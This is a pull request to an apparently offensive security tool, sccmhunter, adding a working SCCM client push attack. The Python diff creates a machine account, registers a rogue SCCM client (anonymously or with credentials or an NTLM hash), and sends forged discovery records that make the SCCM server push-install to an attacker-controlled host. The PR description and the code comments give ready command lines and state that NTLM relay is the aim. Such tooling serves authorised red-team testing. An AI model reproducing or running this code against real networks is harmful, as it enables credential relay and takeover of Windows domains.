### PR TITLE
add 'SCCM client push' feature

### DIFF
--- a/lib/attacks/http.py
+++ b/lib/attacks/http.py
@@ -11,6 +11,7 @@ import random
 import string
 import sqlite3
 import ldap3
+import time
 import sys
 import os
 import re
@@ -20,8 +21,8 @@ class HTTP:
     
     def __init__(self, username=None, password=None, domain=None, target_dom=None, 
                     dc_ip=None,ldaps=False, channel_binding=False, kerberos=False, no_pass=False, hashes=None, 
-                    aes=None, debug=False, auto=False, computer_pass=None, computer_name=None,
-                    uuid=None, mp=None, sleep=None, logs_dir=None):
+                    aes=None, debug=False, auto=False, computer_pass=None, computer_hash=None,computer_name=None,
+                    uuid=None, mp=None, sp=False, spcn=None, sppid=None, spanon=False,sleep=None, logs_dir=None):
         self.username = username
         self.password = password
         self.domain = domain
@@ -38,9 +39,14 @@ class HTTP:
         self.search_base = None
         self.auto = auto
         self.computer_name = computer_name
+        self.computer_hash = computer_hash
         self.computer_pass = computer_pass
         self.uuid = uuid
         self.mp = mp
+        self.sp = sp
+        self.spcn = spcn
+        self.sppid = sppid
+        self.spanon = spanon
         self.sleep = int(sleep)
         self.targets = []
         self.logs_dir = logs_dir
@@ -49,6 +55,9 @@ class HTTP:
 
  
     def run(self):
+        if self.sp:
+            self.sccm_push()
+            return
         if self.uuid:
             self.manual_request()
             return
@@ -81,11 +90,11 @@ class HTTP:
             #TODO: Need some terminal output for actions taken
             #      Need better error handling
             target_mp_url = f"http://{self.mp}"
-            sccmwtf = SCCMTools(target_name="", target_fqdn="", target_sccm=target_mp_url, target_username="", target_password="", sleep=self.sleep, logs_dir=self.logs_dir)
+            sccmwtf = SCCMTools(target_name="", target_fqdn="", target_sccm=target_mp_url, target_username="", target_password="", sleep=self.sleep, logs_dir=self.logs_dir,sp=self.sp,plid=self.sppid)
             with open (f"{self.logs_dir}/{self.uuid}.data", "rb") as f:
                 data = f.read()
             with open (f"{self.logs_dir}/{self.uuid}.pem", "rb") as g:
-                key = serialization.load_pem_private_key(g.read(), password=b"mimikatz")           
+                key = serialization.load_pem_private_key(g.read(), password=b"mimikatz")
             deflatedData = sccmwtf.sendCCMPostRequest(data=data, mp=target_mp_url)
             result = re.search(r"PolicyCategory=\"NAAConfig\".*?<!\[CDATA\[https*://<mp>([^]]+)", deflatedData, re.DOTALL + re.MULTILINE)
             urls = [result.group(1)]
@@ -103,15 +112,77 @@ class HTTP:
             logger.info(f"Missing required files -- check the UUID.")
         except Exception as e:
             logger.info(e)
+        
+#examples:
+# A. with an already compromised machine account:
+#       python3 sccmhunter.py http  -mp '<target>' -cn  '<compromised_machine>$' -ch '<compromised_machine_ntlm_hash>' -sleep 10 -sp  -spcn '<ntlm_relay_IP>' -dc-ip <DC_IP>  -d <DOMAIN> 
+# B. with a user/machine account that will (1)created a new machine account in the domain  (2) register a new client;
+#       python3 sccmhunter.py http  -mp <target> -u '<username>' -p <password> -sleep 3 -sp  -spcn '<ntlm_relay_IP>' -dc-ip <DC_IP> -d <DOMAIN>
+# C. Unauthenticated registration => unapproved client but still triggers the sccm push (may not work in certain cases) (actually very efficient during tests)
+#        python3 sccmhunter.py http  -mp <target> -sleep 10 -sp  -spcn '<ntlm_relay_IP>' -dc-ip <DC_IP> -d <DOMAIN> -sppid 'Microsoft Windows NT Server 10.0' --sccm-push-anonymous
+    def sccm_push(self):
+        logger.info(f"[*] Performing SCCM client push attack")
+        key = None
 
+        if self.uuid:
+            logger.info(f"Detected uuid, trying to reuse alreday created client with uuid: {self.uuid}, \n[!] probably wont work since client needs to be not installed to trigger sccm push... ")
+            with open (f"{self.logs_dir}/{self.uuid}.pem", "rb") as g:
+                key = serialization.load_pem_private_key(g.read(), password=b"mimikatz")
+        elif (self.computer_name and (self.computer_pass or self.computer_hash)) :
+            logger.info(f"Detected provided computer name and credentials, trying to reuse already existing computer to enroll a new client !")
+            if not self.computer_pass:
+                self.computer_pass = '0'*32 + ':' + self.computer_hash
+        elif (self.spanon):
+            pass
+        else:
+            if not (self.username and (self.password or self.hashes)):
+                logger.info("Missing user credentials, check your arguments and try again. You can also perform unauthenticated client registration --sccm-push-anonymous")
+                sys.exit(1)
+            if not (self.spcn):
+                logger.info("[-] Client Name (-spcn) required when usign sccm push attack")
+                sys.exit(1)
+            logger.info("[*]Attempting to add a machine account then trigger sccm push.")
+            self.computer_name = f'DESKTOP-' + (''.join(random.choice(string.ascii_uppercase + string.digits) for _ in range(8)) + '$')
+            self.computer_pass = f''.join(random.choice(string.ascii_letters + string.digits) for _ in range(12))
+            samradd = AddComputerSAMR(self.username, self.password, self.domain, self.hashes, self.aes, self.kerberos, 
+                                   self.dc_ip, self.computer_name, self.computer_pass)
+            samradd.run()
+
+            if self.validate_add(self.computer_name):
+                logger.info(f'[+] {self.computer_name} created with password: {self.computer_pass}')
+            else:
+                logger.info(f'[-] Could not validate successful creation.')
+       
+            if not (self.computer_name or self.computer_pass):
+                logger.info("[-] Missing machine account credentials, check your arguments and try again.")
+                sys.exit()
+        
+        target_fqdn = f'{self.spcn.upper()}'
+        sccmwtf = SCCMTools(target_name=self.spcn, target_fqdn=target_fqdn, 
+                            target_sccm=self.mp,target_username=self.username, 
+                            target_password=self.password, sleep=self.sleep, 
+                            logs_dir=self.logs_dir,sp=self.sp,plid=self.sppid)
+        try:
+            uuid = self.uuid
+            if not uuid:
+                sccmwtf.createCertificate(True)
+                uuid = sccmwtf.sendRegistration(self.spcn, target_fqdn,self.computer_name,self.computer_pass,isauthenticated=(not self.spanon),policies=False)
+                sccmwtf.rename_key(uuid) #save key for reuse
+                key = sccmwtf.key
+                logger.info(f"[+] Client {self.spcn} registered with UUID: {uuid}")
+                logger.info(f"[*] Waiting {self.sleep} seconds for database to update.")
+                time.sleep(self.sleep)
+            sccmwtf.sccmPush(uuid,self.spcn,self.domain,self.sppid,self.computer_name,self.computer_pass,key=key)
+        except Exception as e:
+            print(e)
+            logger.info("[-] Something wrong occured")
 
     def autopwn(self):
         if self.auto:
             if not (self.username or self.password):
                 logger.info("Missing user credentials, check your arguments and try again.")
                 sys.exit()
-            logger.info("[*] User selected auto. Attempting to add a machine account then request policies."
-                        )
+            logger.info("[*] User selected auto. Attempting to add a machine account then request policies.")
             self.computer_name = f'DESKTOP-' + (''.join(random.choice(string.ascii_uppercase + string.digits) for _ in range(8)) + '$')
             self.computer_pass = f''.join(random.choice(string.ascii_letters + string.digits) for _ in range(12))
             samradd = AddComputerSAMR(self.username, self.password, self.domain, self.hashes, self.aes, self.kerberos, 

--- a/lib/commands/http.py
+++ b/lib/commands/http.py
@@ -22,15 +22,23 @@ def main(
     debug           : bool  = typer.Option(False, '-debug',help='Enable Verbose Logging'),
     auto            : bool  = typer.Option(False, '-auto', help='Attempt to create a machine and recover policies with provided credentials.'),
     computer_pass   : str   = typer.Option(None, '-cp', help='Machine account password'),
+    computer_hash   : str   = typer.Option(None, '-ch', help='Machine account NTLM hash. (can be used *only* for sccm push attack)'),
     computer_name   : str   = typer.Option(None, '-cn', help='Machine account name.'),
     uuid            : str   = typer.Option(None, '-uuid', help='UUID for manual request.'),
     mp              : str   = typer.Option(None, '-mp', help='Management Point to manually request from'),
-    sleep           : str   = typer.Option(10, '-sleep', help='Time to wait between registering and requesting policies')):
+    sleep           : str   = typer.Option(10, '-sleep', help='Time to wait between registering and requesting policies'),
+    sccmpush        : bool  = typer.Option(False, "--sccm-push", "-sp", help="[Optional] Try to trigger sccm push on specified client"),
+    sccmpush_client : str   = typer.Option(None, "--sccm-push-cn", "-spcn", help="[Mandatory with --sccm-push] client name to be registerd when performing sccm push attack which should be a controlled & reachable IP/FQDN)"),
+    sccmpush_anon   : bool   = typer.Option(False, "--sccm-push-anonymous", "-spanon", help="try to perform sccm push without credentials"),
+    platform_id     : str   = typer.Option("Microsoft Windows NT Workstation 2010.0","--sccm-push-plid", "-sppid", help="[Optional] Specify the plateformID when performing sccm push attack (ex: Microsoft Windows NT Server 10.0)")
+    ):
+
 
     logs_dir = init_logger(debug)
     httphunter = HTTP(username=username, password=password, domain=domain, dc_ip=dc_ip,ldaps=ldaps,
                             kerberos=kerberos, no_pass=no_pass, hashes=hashes, aes=aes, debug=debug, auto=auto, channel_binding=channel_binding,
-                            computer_pass=computer_pass, computer_name=computer_name, uuid=uuid, mp=mp, sleep=sleep, logs_dir=logs_dir)
+                            computer_pass=computer_pass, computer_name=computer_name, computer_hash=computer_hash, uuid=uuid, mp=mp, 
+                            sp=sccmpush, spcn=sccmpush_client,sppid=platform_id, spanon=sccmpush_anon,sleep=sleep, logs_dir=logs_dir)
     httphunter.run()
 
 

--- a/lib/scripts/sccmwtf.py
+++ b/lib/scripts/sccmwtf.py
@@ -39,11 +39,16 @@ now = datetime.datetime.utcnow()
 
 # Huge thanks to @_Mayyhem with SharpSCCM for making requesting these easy!
 registrationRequestWrapper = "<ClientRegistrationRequest>{data}<Signature><SignatureValue>{signature}</SignatureValue></Signature></ClientRegistrationRequest>\x00"
-registrationRequest = """<Data HashAlgorithm="1.2.840.113549.1.1.11" SMSID="" RequestType="Registration" TimeStamp="{date}"><AgentInformation AgentIdentity="CCMSetup.exe" AgentVersion="5.00.8325.0000" AgentType="0" /><Certificates><Encryption Encoding="HexBinary" KeyType="1">{encryption}</Encryption><Signing Encoding="HexBinary" KeyType="1">{signature}</Signing></Certificates><DiscoveryProperties><Property Name="Netbios Name" Value="{client}" /><Property Name="FQ Name" Value="{clientfqdn}" /><Property Name="Locale ID" Value="2057" /><Property Name="InternetFlag" Value="0" /></DiscoveryProperties></Data>"""
+registrationRequest = """<Data HashAlgorithm="1.2.840.113549.1.1.11" SMSID="" RequestType="Registration" TimeStamp="{date}"><AgentInformation AgentIdentity="CCMSetup.exe" AgentVersion="5.00.8325.0000" AgentType="0" /><Certificates><Encryption Encoding="HexBinary" KeyType="1">{encryption}</Encryption><Signing Encoding="HexBinary" KeyType="1">{signature}</Signing></Certificates><DiscoveryProperties><Property Name="Netbios Name" Value="{client}" /><Property Name="FQ Name" Value="{clientfqdn}" /><Property Name="Locale ID" Value="2058" /><Property Name="InternetFlag" Value="0" /></DiscoveryProperties></Data>"""
 msgHeader = """<Msg ReplyCompression="zlib" SchemaVersion="1.1"><Body Type="ByteRange" Length="{bodylength}" Offset="0" /><CorrelationID>{{00000000-0000-0000-0000-000000000000}}</CorrelationID><Hooks><Hook3 Name="zlib-compress" /></Hooks><ID>{{5DD100CD-DF1D-45F5-BA17-A327F43465F8}}</ID><Payload Type="inline" /><Priority>0</Priority><Protocol>http</Protocol><ReplyMode>Sync</ReplyMode><ReplyTo>direct:{client}:SccmMessaging</ReplyTo><SentTime>{date}</SentTime><SourceHost>{client}</SourceHost><TargetAddress>mp:MP_ClientRegistration</TargetAddress><TargetEndpoint>MP_ClientRegistration</TargetEndpoint><TargetHost>{sccmserver}</TargetHost><Timeout>60000</Timeout></Msg>"""
 msgHeaderPolicy = """<Msg ReplyCompression="zlib" SchemaVersion="1.1"><Body Type="ByteRange" Length="{bodylength}" Offset="0" /><CorrelationID>{{00000000-0000-0000-0000-000000000000}}</CorrelationID><Hooks><Hook2 Name="clientauth"><Property Name="AuthSenderMachine">{client}</Property><Property Name="PublicKey">{publickey}</Property><Property Name="ClientIDSignature">{clientIDsignature}</Property><Property Name="PayloadSignature">{payloadsignature}</Property><Property Name="ClientCapabilities">NonSSL</Property><Property Name="HashAlgorithm">1.2.840.113549.1.1.11</Property></Hook2><Hook3 Name="zlib-compress" /></Hooks><ID>{{041A35B4-DCEE-4F64-A978-D4D489F47D28}}</ID><Payload Type="inline" /><Priority>0</Priority><Protocol>http</Protocol><ReplyMode>Sync</ReplyMode><ReplyTo>direct:{client}:SccmMessaging</ReplyTo><SentTime>{date}</SentTime><SourceID>GUID:{clientid}</SourceID><SourceHost>{client}</SourceHost><TargetAddress>mp:MP_PolicyManager</TargetAddress><TargetEndpoint>MP_PolicyManager</TargetEndpoint><TargetHost>{sccmserver}</TargetHost><Timeout>60000</Timeout></Msg>"""
 policyBody = """<RequestAssignments SchemaVersion="1.00" ACK="false" RequestType="Always"><Identification><Machine><ClientID>GUID:{clientid}</ClientID><FQDN>{clientfqdn}</FQDN><NetBIOSName>{client}</NetBIOSName><SID /></Machine><User /></Identification><PolicySource>SMS:PRI</PolicySource><Resource ResourceType="Machine" /><ServerCookie /></RequestAssignments>"""
 reportBody = """<Report><ReportHeader><Identification><Machine><ClientInstalled>0</ClientInstalled><ClientType>1</ClientType><ClientID>GUID:{clientid}</ClientID><ClientVersion>5.00.8325.0000</ClientVersion><NetBIOSName>{client}</NetBIOSName><CodePage>850</CodePage><SystemDefaultLCID>2057</SystemDefaultLCID><Priority /></Machine></Identification><ReportDetails><ReportContent>Inventory Data</ReportContent><ReportType>Full</ReportType><Date>{date}</Date><Version>1.0</Version><Format>1.1</Format></ReportDetails><InventoryAction ActionType="Predefined"><InventoryActionID>{{00000000-0000-0000-0000-000000000003}}</InventoryActionID><Description>Discovery</Description><InventoryActionLastUpdateTime>{date}</InventoryActionLastUpdateTime></InventoryAction></ReportHeader><ReportBody /></Report>"""
+#Inspired from SharpSCCM.exe requests
+ddrRequestHeader = """<Msg ReplyCompression="zlib" SchemaVersion="1.1"><Attachment Type="ByteRange" Length="{length1}" Name="403838f7-69bb-43d5-8362-28a5755b97b5" Offset="0" /><Attachment Length="{length2}" Offset="{offset}" /><Body Type="ByteRange" Length="{bodylength}" Offset="{bodyoffset}" /><CorrelationID>{{00000000-0000-0000-0000-000000000000}}</CorrelationID><Hooks><Hook2 Name="clientauth"><Property Name="AuthSenderMachine">{client}</Property><Property Name="PublicKey">{publickey}</Property><Property Name="ClientIDSignature">{clientIDsignature}</Property><Property Name="PayloadSignature">{payloadsignature}</Property><Property Name="ClientCapabilities">NonSSL</Property><Property Name="HashAlgorithm">1.2.840.113549.1.1.11</Property></Hook2><Hook3 Name="zlib-compress" /></Hooks><ID>{{CA6A20DC-2440-44B1-A78F-E2FE792973BA}}</ID><Payload Type="inline" /><Priority>0</Priority><Protocol>http</Protocol><ReplyMode>ASync</ReplyMode><ReplyTo>direct:{client}:SccmMessaging</ReplyTo><SentTime>{date}</SentTime><SourceID>GUID:{clientid}</SourceID><SourceHost>{client}</SourceHost><TargetAddress>mp:MP_DdrEndpoint</TargetAddress><TargetEndpoint>MP_DdrEndpoint</TargetEndpoint><TargetHost>{sccmserver}</TargetHost><Timeout>60000</Timeout></Msg>"""
+ddrBody1="""<Report><ReportHeader><Identification><Machine><ClientInstalled>0</ClientInstalled><ClientType>1</ClientType><ClientID>GUID:{clientid}</ClientID><ClientVersion>5.00.8325.0000</ClientVersion><NetBIOSName>{client}</NetBIOSName><CodePage>437</CodePage><SystemDefaultLCID>1033</SystemDefaultLCID><Priority /></Machine></Identification><ReportDetails><ReportContent>Inventory Data</ReportContent><ReportType>Full</ReportType><Date>{date}</Date><Version>1.0</Version><Format>1.1</Format></ReportDetails><InventoryAction ActionType="Predefined"><InventoryActionID>{{00000000-0000-0000-0000-000000000003}}</InventoryActionID><Description>Discovery</Description><InventoryActionLastUpdateTime>{date}</InventoryActionLastUpdateTime></InventoryAction></ReportHeader><ReportBody /></Report>"""
+ddrBody2="""<Report><ReportHeader><Identification><Machine><ClientInstalled>0</ClientInstalled><ClientType>1</ClientType><ClientID>GUID:{clientid}</ClientID><ClientVersion>5.00.8325.0000</ClientVersion><NetBIOSName>{client}</NetBIOSName><CodePage>437</CodePage><SystemDefaultLCID>1033</SystemDefaultLCID><Priority /></Machine></Identification><ReportDetails><ReportContent>Inventory Data</ReportContent><ReportType>Full</ReportType><Date>{date}</Date><Version>1.0</Version><Format>1.1</Format></ReportDetails><InventoryAction ActionType="Predefined"><InventoryActionID>{{00000000-0000-0000-0000-000000000003}}</InventoryActionID><Description>Discovery</Description><InventoryActionLastUpdateTime>{date}</InventoryActionLastUpdateTime></InventoryAction></ReportHeader><ReportBody><Instance Content="New" Namespace="\\\\{client}\\root\\ccm" Class="CCM_ComputerSystem" ParentClass="CCM_ComputerSystem"><CCM_ComputerSystem><Domain>{domain}</Domain></CCM_ComputerSystem></Instance><Instance Content="New" Namespace="\\\\{client}\\root\\ccm" Class="CCM_Client" ParentClass="CCM_Client"><CCM_Client><ClientIdChangeDate>{date2}</ClientIdChangeDate><ClientVersion>5.00.8325.0000</ClientVersion><PreviousClientId>Unknown</PreviousClientId></CCM_Client></Instance><Instance Content="New" Namespace="\\\\{client}\\root\\ccm" Class="SMS_Authority" ParentClass="SMS_Authority"><SMS_Authority /></Instance><Instance Content="New" Namespace="\\\\{client}\\root\\ccm" Class="CCM_ADSiteInfo" ParentClass="CCM_ADSiteInfo"><CCM_ADSiteInfo><ADSiteName>Default-First-Site-Name</ADSiteName></CCM_ADSiteInfo></Instance><Instance Content="New" Namespace="\\\\{client}\\root\\ccm" Class="CCM_ExtNetworkAdapterConfiguration" ParentClass="CCM_ExtNetworkAdapterConfiguration"><CCM_ExtNetworkAdapterConfiguration><FQDN>{clientfqdn}</FQDN></CCM_ExtNetworkAdapterConfiguration></Instance><Instance Content="New" Namespace="\\\\{client}\\root\\ccm" Class="Win32_ComputerSystemProduct" ParentClass="Win32_ComputerSystemProduct"><Win32_ComputerSystemProduct><IdentifyingNumber /><Name>Standard PC (i440FX + PIIX, 1996)</Name><UUID>{clientid}</UUID><Version>pc-i440fx-9.2</Version></Win32_ComputerSystemProduct></Instance><Instance Content="New" Namespace="\\\\{client}\\root\\ccm" Class="CCM_DiscoveryData" ParentClass="CCM_DiscoveryData"><CCM_DiscoveryData><PlatformID>{platformID}</PlatformID></CCM_DiscoveryData></Instance><Instance Content="New" Namespace="\\\\{client}\\root\\ccm" Class="CCM_NetworkAdapterConfiguration" ParentClass="CCM_NetworkAdapterConfiguration"><CCM_NetworkAdapterConfiguration><IPSubnet>10.6.10.0</IPSubnet><IPSubnet>254.128.0.0</IPSubnet></CCM_NetworkAdapterConfiguration></Instance><Instance Content="New" Namespace="\\\\{client}\\root\\ccm" Class="Win32_NetworkAdapterConfiguration" ParentClass="Win32_NetworkAdapterConfiguration"><Win32_NetworkAdapterConfiguration><IPAddress>10.6.10.43</IPAddress><IPAddress>fe80::d89c:e797:5954:7db1</IPAddress><Index>1</Index><MACAddress>BC:25:11:8B:02:CF</MACAddress></Win32_NetworkAdapterConfiguration></Instance></ReportBody></Report>"""
+
 
 class Tools:
   @staticmethod
@@ -56,6 +61,7 @@ class Tools:
     with open(file, "w", encoding='utf-8') as fd:
       fd.write(input)
   
+
   @staticmethod
   def write_to_csv(input, logs_dir):
       fields = ["username", "password"]
@@ -103,6 +109,9 @@ class CryptoTools:
     def generateRSAKey():
         key = rsa.generate_private_key(public_exponent=65537, key_size=2048)
         return key
+    @staticmethod
+    def encodeUTF16Strip(data):
+        return data.encode('utf-16')[2:]
 
     @staticmethod
     def buildMSPublicKeyBlob(key):
@@ -141,7 +150,7 @@ class CryptoTools:
 
 class SCCMTools():
 
-    def __init__(self, target_name, target_fqdn, target_sccm, target_username, target_password, sleep, logs_dir):
+    def __init__(self, target_name, target_fqdn, target_sccm, target_username, target_password,sleep, logs_dir,sp=False,plid=None):
         self._server = target_sccm
         self._serverURI = f"http://{self._server}"
         self._target_name = target_name
@@ -150,8 +159,11 @@ class SCCMTools():
         self.target_password = target_password
         self.sleep = sleep
         self.logs_dir = logs_dir
+        self.sp = sp
+        self.plid = plid
+        self.domain = target_fqdn.replace(self._target_name+".","")
 
-    def sendCCMPostRequest(self, data, auth=False, username="", password="", mp = ""):
+    def sendCCMPostRequest(self, data, auth=False, username="", password="", mp = "", policies=True):
         headers = {
             "Connection": "close",
             "User-Agent": "ConfigMgr Messaging HTTP Sender",
@@ -164,7 +176,7 @@ class SCCMTools():
         if auth:
             r = requests.request("CCM_POST", f"{self._serverURI}/ccm_system_windowsauth/request", headers=headers, data=data, auth=HttpNtlmAuth(username, password))
         else:
-            r = self.sendCCMPostRequestWithOutAuth(data, headers)
+            r = self.sendCCMPostRequestWithOutAuth(data, headers, policies=policies)
         if r:
             multipart_data = decoder.MultipartDecoder.from_response(r)
             for part in multipart_data.parts:
@@ -173,8 +185,70 @@ class SCCMTools():
                 else:
                     pass
 
+    def sccmPush(self,uuid,name,domain,platformId,username,password,key=None):
+        logger.info("[*] ensure to be on same time zone as the SCCM server.")
+        #time = datetime.datetime.now() - datetime.timedelta(hours=CHANGEME_IF_NEEDED)
+        time = datetime.datetime.now()
+        formatted_time = time.strftime(dateFormat2)
+        formatted_time2 = time.strftime(dateFormat3)
+
+       
+
+        #Inspired from SharpSCMM.exe http capture  
+        DDRRequest1 = CryptoTools.encodeUTF16Strip(ddrBody1.format(
+            clientid=uuid,
+            clientfqdn=name,
+            client=name,
+            platformID=platformId,
+            date=formatted_time,
+            domain=domain
+        )) + b"\x00\x00\r\n"
+        DDRRequest2 = CryptoTools.encodeUTF16Strip(ddrBody2.format(
+            clientid=uuid,
+            clientfqdn=name,
+            client=name,
+            platformID=platformId,
+            date=formatted_time,
+            date2=formatted_time2,
+            domain=domain
+        )) + b"\x00\x00\r\n"
+
+        DDRRequestCompressed = zlib.compress(DDRRequest1+DDRRequest2)
+        
+        if key:
+            self.key = key
+        MSPublicKey = CryptoTools.buildMSPublicKeyBlob(self.key)
+        clientID = f"GUID:{uuid.upper()}"
+        clientIDSignature = CryptoTools.sign(self.key, CryptoTools.encodeUTF16Strip(clientID) + "\x00\x00".encode('ascii')).hex().upper()
+        DDRRequestSignature = CryptoTools.sign(self.key, DDRRequestCompressed).hex().upper()
+
+
+        #don't touch offsets, it works, I don't know why but it works
+        l2=len(DDRRequest2)
+        l1=len(DDRRequest1)
+        DDRRequestHeader = ddrRequestHeader.format(
+          bodylength=l2-2,
+          bodyoffset=l1,
+          length1=l1-4,
+          offset=l1,
+          length2=l2-4,
+          sccmserver=self._server, 
+          client=name,
+          publickey=MSPublicKey, 
+          clientIDsignature=clientIDSignature, 
+          payloadsignature=DDRRequestSignature, 
+          clientid=uuid, 
+          date=formatted_time,
+       )
+        
+        data = "--aAbBcCdDv1234567890VxXyYzZ\r\ncontent-type: text/plain; charset=UTF-16\r\n\r\n".encode('ascii')
+        data += DDRRequestHeader.encode('utf-16') + "\r\n--aAbBcCdDv1234567890VxXyYzZ\r\ncontent-type: application/octet-stream\r\n\r\n".encode('ascii')
+        data += DDRRequestCompressed + "\r\n--aAbBcCdDv1234567890VxXyYzZ--".encode('ascii')
+        logger.info(f"[+] Sending DDR from GUID:{uuid} ")
+        logger.info(f"[+] Changing platformID to {platformId}, should trigger client push")
+        self.sendCCMPostRequest(data)
             
-    def sendCCMPostRequestWithOutAuth(self, data, headers):
+    def sendCCMPostRequestWithOutAuth(self, data, headers,policies=True):
         r = requests.request("CCM_POST", f"{self._serverURI}/ccm_system/request", headers=headers, data=data)
         #check if the response actually has a body, if not sleep and try again
         if r.headers.get('Content-Length') == "0":
@@ -182,6 +256,8 @@ class SCCMTools():
             time.sleep(5)
             return self.sendCCMPostRequestWithOutAuth(data, headers)
         else:
+            if not policies:
+                return r
             logger.debug("[*] Policy available, decoding")
             multipart_data = decoder.MultipartDecoder.from_response(r)
             for part in multipart_data.parts:
@@ -235,7 +311,7 @@ class SCCMTools():
             with open(f"{os.getcwd()}/certificate.pem", "wb") as f:
                 f.write(self.cert.public_bytes(serialization.Encoding.PEM))
 
-    def sendRegistration(self, name, fqname, username, password):
+    def sendRegistration(self, name, fqname, username, password, isauthenticated=True, policies=True):
         b = self.cert.public_bytes(serialization.Encoding.DER).hex().upper()
 
         embedded = registrationRequest.format(
@@ -258,8 +334,18 @@ class SCCMTools():
 
         data = "--aAbBcCdDv1234567890VxXyYzZ\r\ncontent-type: text/plain; charset=UTF-16\r\n\r\n".encode('ascii') + header.encode('utf-16') + "\r\n--aAbBcCdDv1234567890VxXyYzZ\r\ncontent-type: application/octet-stream\r\n\r\n".encode('ascii') + zlib.compress(request) + "\r\n--aAbBcCdDv1234567890VxXyYzZ--".encode('ascii')
 
-        deflatedData = self.sendCCMPostRequest(data, True, username, password)
-        r = re.findall("SMSID=\"GUID:([^\"]+)\"", deflatedData)
+
+        if not isauthenticated:
+            try:
+                logger.info("[*] trying unauthenticated registration")
+                deflatedData = self.sendCCMPostRequest(data, False, username, password,policies=policies)
+                r = re.findall("SMSID=\"GUID:([^\"]+)\"", deflatedData)
+            except:
+                logger.info("[!] unauthenticated registration failed you should try with credentials")
+                raise "Failed"
+        else:
+                deflatedData = self.sendCCMPostRequest(data, True, username, password,policies=policies)
+                r = re.findall("SMSID=\"GUID:([^\"]+)\"", deflatedData)
         if r != None:
             return r[0]
 


### PR DESCRIPTION
Hi,
This PR is here to provide a feature to the "http" module that attempts to trigger the SCCM client push installation.

The script sends specific requests to the DdrEndpoint to trigger the SCCM client push  installation if it is enabled, the main goal is obviously to perform NTLM relay attacks. 
This can be done anonymously; however, the client registered this way will not be approved. Credentials can also be provided to register an approved client.

This python implementation is totally based on amazing work from  Mayyhem : https://github.com/Mayyhem/SharpSCCM.

The simplest test to attempt this action is:
```
python3 sccmhunter.py http  -mp <target> -sleep 10 -sp  -spcn '<ntlm_relay_IP>' -dc-ip <DC_IP> -d <DOMAIN> --sccm-push-anonymous

```